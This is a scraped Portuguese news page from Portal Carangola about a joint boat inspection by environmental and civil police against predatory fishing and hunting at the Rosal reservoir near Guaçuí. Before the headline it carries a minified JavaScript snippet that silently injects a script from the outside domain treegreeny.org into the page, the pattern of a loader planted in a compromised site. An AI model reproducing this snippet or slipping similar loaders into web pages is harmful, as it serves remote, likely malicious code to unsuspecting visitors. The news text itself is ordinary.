;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Ação conjunta embarcada das Policias Ambiental e Civil de Guaçui para combate a caça e pesca - Portal Carangola

www.portalcarangola.com

O primeiro portal de notícias de Carangola-MG e região.

Portal Carangola

O 1º site de notícias de Carangola e Região

Ação conjunta embarcada das Policias Ambiental e Civil de Guaçui para combate a caça e pesca

Em menos de trinta dias após a última fiscalização, a Polícia Militar Ambiental em ação conjunta com a Polícia Civil de Guaçuí, realizaram durante toda tarde de quinta-feira (18) nova fiscalização embarcada, no Reservatório da Usina Hidrelétrica de Rosal, visando coibir a pesca predatória naquela região.

Participaram da ação o Delegado da Polícia Civil Dr. Fábio Teixeira Machado, o Investigador Maxsandro Dufrayer Souza, o Comandante da Polícia Ambiental da Região do Caparaó 1º Ten PM Roberto Martins, além dos policiais militares Cb PM Ribeiro e Sd Carvalho que atuam rotineiramente naquela área.

Além de consolidar importante parceria entre as Polícias Militar e Civil, que é uma realidade na região, a ação buscou averiguar as denúncias de pesca e caça que existe na área do reservatório, incluindo o Parque Municipal de Guaçuí, o qual possui uma fauna e flora bem diversificada.

A equipe fez um percurso à pé nas proximidades do Parque Municipal e no reservatório em busca de caçadores e pescadores investigando os indícios da existência de tarrafas, espinheis, anzóis de galho, redes, dentre outros equipamentos usados na prática de crimes ambientais.

Várias pessoas foram abordadas e receberam orientações das polícias civil e militar, bem como, puderam repassar informações importantes aos policiais que já articulam futuras ações.

Tanto o Tenente Martins como o Delegado Fábio Teixeira, avaliaram como muito positiva a ação, não só pela integração das duas polícias em um só objetivo, como também, a sensação de segurança que foi transmitida para as pessoas residentes no local, como também para se levantar dados possibilitando assim, a realização de ações conjuntas em horários diversificados, buscando uma consciência de preservação ambiental e, ”sobretudo de respeito às leis”.

As denúncias para a Polícia Militar Ambiental poderão ser feitas pelos telefones (28) 3553-2042 e (28) 3553-1398, bem como pelo e-mail: policiaambientalguacui@gmail.com .

Com informações e fotos de Roberto MARTINS 1º Ten PM

Ofertas

Deixe um comentário

O seu endereço de e-mail não será publicado. Campos obrigatórios são marcados com *

Esse site utiliza o Akismet para reduzir spam. Aprenda como seus dados de comentários são processados.